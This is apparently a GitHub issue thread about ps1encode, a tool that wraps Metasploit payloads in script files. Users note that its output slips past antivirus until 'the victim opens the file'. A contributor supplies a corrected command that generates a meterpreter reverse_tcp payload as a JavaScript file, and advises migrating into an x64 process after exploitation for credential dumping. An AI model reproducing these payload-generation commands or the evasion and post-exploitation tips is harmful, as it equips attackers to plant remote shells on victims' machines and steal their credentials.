Good but Gets detected.... #9

Open
complexpotato opened this issue Jan 2, 2018 · 3 comments

Comments

@complexpotato

This really should not be an issue but I am just posting this to let other people know...
ps1encode is really good; it does not get caught until the victim opens the file, but it gets caught because the antivirus saw it doing an Evo-Gen activity.

@BeingEasy

--PAYLOAD windows/x64/meterpreter/reverse_tcp --ENCODE cmd -t js > x64shell.js
Error: The selected arch is incompatible with the payload
why?

@addenial
Contributor

addenial commented Jul 8, 2019

Hey @BeingEasy, when selecting your encoder, the --ENCODE switch is the same as -t.
The tool as of now does not support native x64 shells, but generating a standard x86 payload will work on 64-bit systems. If you need a native-architecture meterpreter for credential dumping purposes, I suggest using the "migrate" command to hook into an x64 process post-exploit.

Try this:
--PAYLOAD windows/meterpreter/reverse_tcp --ENCODE js > x86-64shell.js

@addenial
Contributor

@BeingEasy added x64 support addenial@a52cb04
